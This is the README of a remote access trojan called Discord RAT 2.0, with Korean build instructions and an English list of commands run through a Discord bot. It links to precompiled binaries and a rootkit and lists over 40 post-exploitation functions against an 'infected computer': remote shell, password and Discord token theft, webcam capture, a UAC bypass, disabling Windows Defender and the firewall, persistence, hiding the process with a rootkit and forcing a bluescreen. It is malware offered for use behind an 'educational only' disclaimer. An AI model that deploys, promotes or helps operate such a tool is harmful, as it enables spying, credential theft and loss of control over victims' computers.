Discord RAT 2.0
Discord 원격 관리 도구는 C#으로 완전히 작성되었습니다.
이것은 40개 이상의 사후 공격 모듈을 갖춘 Discord를 통해 제어되는 RAT입니다.
출력 파일 크기도 약 75kb입니다!
이 도구는 교육용으로만 사용되며 작성자는 이 도구의 오용에 대해 책임을 지지 않습니다.
프로젝트의 루트킷은 "bytecode77"에 의해 만들어졌습니다. 루트킷의 소스는 여기에서 찾을 수 있습니다: https://github.com/bytecode77/r77-rootkit
사전 컴파일된 바이너리를 여기에서 다운로드하세요 https://github.com/moom825/Discord-RAT-2.0/releases/tag/2.0
먼저 Discord 개발자 포털에 봇을 등록한 다음 봇을 제어하는 데 사용할 Discord 서버에 봇을 추가해야 합니다(봇이 Discord 서버에서 관리자 권한을 가지고 있는지 확인하세요). 봇이 생성되면 "builder.exe"를 열고 토큰을 붙여넣은 다음 봇을 초대한 길드 ID를 붙여넣습니다.
그런 다음 위의 단계가 성공하면 Client-built.exe
실행하여 파일을 시작할 수 있습니다. 새 채널을 생성하고 생성된 세션 번호와 함께 서버에 메시지를 게시합니다.
이제 봇을 사용할 수 있습니다!
Available commands are : --> !message = Show a message box displaying your text / Syntax = "!message example" --> !shell = Execute a shell command /Syntax = "!shell whoami" --> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test" --> !admincheck = Check if program has admin privileges --> !cd = Changes directory --> !dir = display all items in current dir --> !download = Download a file from infected computer --> !upload = Upload file to the infected computer / Syntax = "!upload file.png" (with attachment) --> !uploadlink = Upload file to the infected computer / Syntax = "!upload link file.png" --> !delete = deletes a file / Syntax = "!delete / path to / the / file.txt" --> !write = Type your desired sentence on computer --> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment) --> !clipboard = Retrieve infected computer clipboard content --> !idletime = Get the idle time of user's on target computer --> !currentdir = display the current dir --> !block = Blocks user's keyboard and mouse / Warning : Admin rights are required --> !unblock = Unblocks user's keyboard and mouse / Warning : Admin rights are required --> !screenshot = Get the screenshot of the user's current screen --> !exit = Exit program --> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all" --> !uacbypass = attempt to bypass uac to gain admin by using windir and slui --> !shutdown = shutdown computer --> !restart = restart computer --> !logoff = log off current user --> !bluescreen = BlueScreen PC --> !datetime = display system date and time --> !prockill = kill a process by name / syntax = "!kill process" --> !disabledefender = Disable windows defender(requires admin) --> !disablefirewall = Disable windows firewall(requires admin) --> !audio = play a audio file on the target computer / Syntax = "!audio" (with attachment) --> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required) --> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required) --> !website = open a website on the infected computer / syntax = "!website www.google.com" --> !disabletaskmgr = disable task manager(Admin rights are required) --> !enabletaskmgr = enable task manager(if disabled)(Admin rights are required) --> !startup = add to startup(when computer go on this file starts) --> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise --> !listprocess = Get all process's --> !password = grab all passwords --> !rootkit = Launch a rootkit (the process will be hidden from taskmgr and you wont be able to see the file)(Admin rights are required) --> !unrootkit = Remove the rootkit(Admin rights are required) --> !getcams = Grab the cameras names and their respected selection number --> !selectcam = Select camera to take a picture out of (default will be camera 1)/ Syntax "!selectcam 1" --> !webcampic = Take a picture out of the selected webcam --> !grabtokens = Grab all discord tokens on the current pc --> !help = This help menu
BTC: bc1qg4zy8w5swc66k9xg29c2x6ennn5cyv2ytlp0a6